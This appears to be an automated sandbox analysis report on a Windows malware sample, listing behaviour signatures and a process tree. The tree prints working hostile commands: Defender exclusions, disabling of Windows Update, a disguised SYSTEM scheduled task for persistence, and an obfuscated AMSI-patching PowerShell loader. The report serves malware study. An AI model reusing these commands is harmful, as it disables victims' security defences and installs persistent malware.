Analysis
-
max time kernel
269s -
max time network
181s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
27-04-2022 10:15
General
-
Target
7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe
-
Size
2.2MB
-
MD5
40caa9b00badca24594571e157a6d2a9
-
SHA1
42f2faf2aa59f38c16824eaa1dc022fddb142565
-
SHA256
7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442
-
SHA512
e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3
Score
10/10
Malware Config
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 3 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1c0d51da-f56c-47aa-aecd-18d963c32e16}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe"C:\Users\Admin\AppData\Local\Temp\7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"3⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exeC:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe4⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
-
C:\Windows\system32\sc.exesc stop bits7⤵
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled7⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""7⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled7⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""7⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled7⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""7⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled7⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""7⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled7⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""7⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f7⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f7⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe6⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "fuljhipnixrs"7⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3864 -s 7962⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3788 -s 8562⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3788 -s 8682⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\sihost.exesihost.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s FontCache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:sCSpnaSHGdbw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jhRKaZNloVMhJq,[Parameter(Position=1)][Type]$NtatWsqAdM)$SLWoElBPlxe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$SLWoElBPlxe.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jhRKaZNloVMhJq).SetImplementationFlags('Runtime,Managed');$SLWoElBPlxe.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NtatWsqAdM,$jhRKaZNloVMhJq).SetImplementationFlags('Runtime,Managed');Write-Output $SLWoElBPlxe.CreateType();}$CFUDACdmpIJWZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$CzKFTiGJydhxjN=$CFUDACdmpIJWZ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WmFhLxqDJZSutgYYwbx=sCSpnaSHGdbw @([String])([IntPtr]);$HgObQZXLvFbZmTjjbGcBff=sCSpnaSHGdbw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YyramdfUWHj=$CFUDACdmpIJWZ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qLBsHtAqXrtRXc=$CzKFTiGJydhxjN.Invoke($Null,@([Object]$YyramdfUWHj,[Object]('Load'+'LibraryA')));$bclrwmQJVCDGjEWbv=$CzKFTiGJydhxjN.Invoke($Null,@([Object]$YyramdfUWHj,[Object]('Vir'+'tual'+'Pro'+'tect')));$HYIYtfG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qLBsHtAqXrtRXc,$WmFhLxqDJZSutgYYwbx).Invoke('a'+'m'+'si.dll');$bwuewxQgBqwOWuToc=$CzKFTiGJydhxjN.Invoke($Null,@([Object]$HYIYtfG,[Object]('Ams'+'iSc'+'an'+'Buffer')));$MaJsHmCnLo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bclrwmQJVCDGjEWbv,$HgObQZXLvFbZmTjjbGcBff).Invoke($bwuewxQgBqwOWuToc,[uint32]8,4,[ref]$MaJsHmCnLo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bwuewxQgBqwOWuToc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bclrwmQJVCDGjEWbv,$HgObQZXLvFbZmTjjbGcBff).Invoke($bwuewxQgBqwOWuToc,[uint32]8,0x20,[ref]$MaJsHmCnLo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:PgSoBzZkMuLb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fyiQhgbbUocHvY,[Parameter(Position=1)][Type]$LZgLMqmgcj)$HAzvzZctUaY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$HAzvzZctUaY.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$fyiQhgbbUocHvY).SetImplementationFlags('Runtime,Managed');$HAzvzZctUaY.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LZgLMqmgcj,$fyiQhgbbUocHvY).SetImplementationFlags('Runtime,Managed');Write-Output $HAzvzZctUaY.CreateType();}$cHKuUPSYySccP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$gTUUFuAotfKofF=$cHKuUPSYySccP.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FeERHyhuafwUApLAoek=PgSoBzZkMuLb @([String])([IntPtr]);$ZDPkjJxllcJiJwneHsQObM=PgSoBzZkMuLb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nqfRUYMtjPZ=$cHKuUPSYySccP.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$igbOTYMpvoXGxq=$gTUUFuAotfKofF.Invoke($Null,@([Object]$nqfRUYMtjPZ,[Object]('Load'+'LibraryA')));$tIKCtuukfMzPlklEz=$gTUUFuAotfKofF.Invoke($Null,@([Object]$nqfRUYMtjPZ,[Object]('Vir'+'tual'+'Pro'+'tect')));$uxNLCsq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($igbOTYMpvoXGxq,$FeERHyhuafwUApLAoek).Invoke('a'+'m'+'si.dll');$KrcBuVBYGGJWvsJdH=$gTUUFuAotfKofF.Invoke($Null,@([Object]$uxNLCsq,[Object]('Ams'+'iSc'+'an'+'Buffer')));$AysJtIicjH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tIKCtuukfMzPlklEz,$ZDPkjJxllcJiJwneHsQObM).Invoke($KrcBuVBYGGJWvsJdH,[uint32]8,4,[ref]$AysJtIicjH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$KrcBuVBYGGJWvsJdH,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tIKCtuukfMzPlklEz,$ZDPkjJxllcJiJwneHsQObM).Invoke($KrcBuVBYGGJWvsJdH,[uint32]8,0x20,[ref]$AysJtIicjH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
